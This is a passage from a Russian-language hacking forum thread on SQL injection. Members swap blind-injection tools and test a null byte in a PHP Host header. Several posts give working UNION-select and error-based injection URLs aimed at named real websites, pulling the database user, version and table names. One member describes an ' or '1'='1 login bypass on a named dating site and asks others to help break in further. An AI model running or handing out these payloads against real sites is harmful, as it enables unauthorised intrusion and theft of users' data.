Старый 03.05.2012, 11:36   #1991
snu2f
 
Аватар для snu2f
 
Регистрация: 24.04.2012
Сообщений: 8
Репутация: -1
По умолчанию

Цитата:
Сообщение от durito Посмотреть сообщение
1. есть ли какое то автоматизированное средство для раскрутки слепых инъекций в PostgerSQL ? в инете ничего путного и рабочего не нашел.
в sqlmap есть
http://sqlmap.sourceforge.net/
Цитата:
Full support for five SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query and stacked queries.
и еще bsqlbf есть
http://code.google.com/p/bsqlbf-v2/
Цитата:
Blind Sql Injection Brute Forcer
Databases supported:

0. MS-SQL

1. MySQL

2. PostgreSQL

3. Oracle
snu2f вне форума   Ответить с цитированием
Старый 03.05.2012, 23:33   #1992
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

может кому и пригодиться:

SIPT 4 отлично справляется с blind в PostgerSQL

и еще вопрос, простите за ламерство, с PostgerSQL никогда не имел дело, если ли аналог count(*) для PostgerSQL. в мануалах ничего подобного не встретил...
durito вне форума   Ответить с цитированием
Старый 04.05.2012, 00:01   #1993
yusmat
 
Регистрация: 08.01.2012
Сообщений: 14
Репутация: 1
По умолчанию

Цитата:
Сообщение от Boolean Посмотреть сообщение
[PHP]

Код:
HTTP/1.1 200 OK
Date: Tue, 01 May 2012 03:41:14 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 22
Connection: close
Content-Type: text/plain; charset=windows-1251

string(9) "localhost"

если нул байт проходит на вход на прием
PHP код:
var_dump("localhost"."abcd".chr(00)."test");
var_dump($_SERVER['HTTP_HOST']); 
давал бы одинаковый результат

а так получаеться что гдето в недрах формирования
http заголовка средствами php или perl
нул байт уже считаеться концом строки
и в запрос не идет

PHP код:
<?php
header
("Content-Type: text/plain; charset=windows-1251");
if(isset(
$_GET['test'])){
    
var_dump("localhost"."abcd".chr(00)."test");
    
var_dump($_SERVER['HTTP_HOST']);
    exit;
}

$fp = @fsockopen('127.0.0.1'80$err1$err25);
fputs($fp"GET /test2.php?test=1 HTTP/1.1\r\n" .
           
"Host: localhost"."abcd".chr(00)."test\r\n" .
           
"Connection: Close\r\n\r\n");
while(!
feof($fp)){
    print 
fgets($fp);
}
?>
yusmat вне форума   Ответить с цитированием
Старый 04.05.2012, 00:19   #1994
Raz0r
 
Аватар для Raz0r
 
Регистрация: 17.07.2010
Сообщений: 100
Репутация: 78
По умолчанию

Цитата:
Сообщение от durito Посмотреть сообщение
может кому и пригодиться:

SIPT 4 отлично справляется с blind в PostgerSQL

и еще вопрос, простите за ламерство, с PostgerSQL никогда не имел дело, если ли аналог count(*) для PostgerSQL. в мануалах ничего подобного не встретил...
есть, так и называется count
Raz0r вне форума   Ответить с цитированием
Старый 04.05.2012, 03:37   #1995
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Вот непонятно, это blind или вывод возможен?
http://www.itspot.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18+--+1
Nightmare вне форума   Ответить с цитированием
Старый 04.05.2012, 04:29   #1996
Lostnull
 
Регистрация: 15.01.2012
Сообщений: 64
Репутация: 5
По умолчанию

Nightmare
http://www.itspot.ru/index.php?id=-146+union+all+select+concat(unhex(Hex(cast(user()+ as+char)))),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18+--+
Lostnull вне форума   Ответить с цитированием
Старый 04.05.2012, 07:18   #1997
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от yusmat Посмотреть сообщение
если нул байт проходит на вход на прием
PHP код:
var_dump("localhost"."abcd".chr(00)."test");
var_dump($_SERVER['HTTP_HOST']); 
давал бы одинаковый результат

а так получаеться что гдето в недрах формирования
http заголовка средствами php или perl
нул байт уже считаеться концом строки
и в запрос не идет

PHP код:
<?php
header
("Content-Type: text/plain; charset=windows-1251");
if(isset(
$_GET['test'])){
    
var_dump("localhost"."abcd".chr(00)."test");
    
var_dump($_SERVER['HTTP_HOST']);
    exit;
}

$fp = @fsockopen('127.0.0.1'80$err1$err25);
fputs($fp"GET /test2.php?test=1 HTTP/1.1\r\n" .
           
"Host: localhost"."abcd".chr(00)."test\r\n" .
           
"Connection: Close\r\n\r\n");
while(!
feof($fp)){
    print 
fgets($fp);
}
?>
Если так уверены, то почему бы не проверить? Всё там идет в запрос.
Показания сниффера:
Код:
79 bytes sent to 127.0.0.1:80
GET /test2.php?test=1 HTTP/1.1
Host: localhostabcd�test
Connection: Close
Код:
378 bytes received by 127.0.0.1:49365
HTTP/1.1 200 OK
Date: Fri, 04 May 2012 03:16:00 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 59
Connection: close
Content-Type: text/plain; charset=windows-1251

string(18) "localhostabcd�test"
string(13) "localhostabcd"
__________________
|
Boolean вне форума   Ответить с цитированием
Старый 04.05.2012, 11:31   #1998
yusmat
 
Регистрация: 08.01.2012
Сообщений: 14
Репутация: 1
По умолчанию

Цитата:
Сообщение от Boolean Посмотреть сообщение
Если так уверены, то почему бы не проверить? Всё там идет в запрос.
да нет я никогда не уверен на 100%
в любом случаи инклюд не работает
PHP код:
include ($_SERVER['HTTP_HOST'].'restore.php'); 
можно бы слешами попробовать но на целевом обьекте версия PHP 5.3.9
yusmat вне форума   Ответить с цитированием
Старый 04.05.2012, 14:33   #1999
Tigger
 
Регистрация: 24.11.2010
Сообщений: 42
Репутация: 11
По умолчанию

Цитата:
Сообщение от Lostnull Посмотреть сообщение
Nightmare
http://www.itspot.ru/index.php?id=-146+union+all+select+concat(unhex(Hex(cast(user()+ as+char)))),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18+--+
И зачем такая конструкция запроса? o0

http://www.itspot.ru/index.php?id=146+and+1=2+union+select+version(),2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
http://www.itspot.ru/index.php?id=146+and+1=2+union+select+TABLE_NAME,2 ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%0aFROM%0 ainformation_schema.tables+limit+0,1--+
Tigger вне форума   Ответить с цитированием
Старый 04.05.2012, 22:58   #2000
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

есть маленькая проблема:

www.dreamdates.com есть скуль - в авторизации вместо пароля вводим ' or '1'='1 и логинимся (login можно оставить пустым)
ветка 4.1.12

дальше имеем скуль в инбоксе:
http://www.dreamdates.com/inbox_msg.php?m=244+or%201%20group%20by%20concat%2 8user%28%29,floor%28rand%280%29*2%29%29%20having%2 0min%280%29%20or%201+--+&n=lonelybol
вот только получить имя базы database() не удается, так и не понял почему.пробовал играться с сообщениями об ошибках, но гад не выводит ни имя базы, ни имена таблиц и полей.

попытался подобрать имена таблиц брутом, тоже без вариантов, то ли префикс специфичный, то ли я отупел в конец
ребят, посмотрите, может у вас что выйдет, а то уже мозг закипает
durito вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot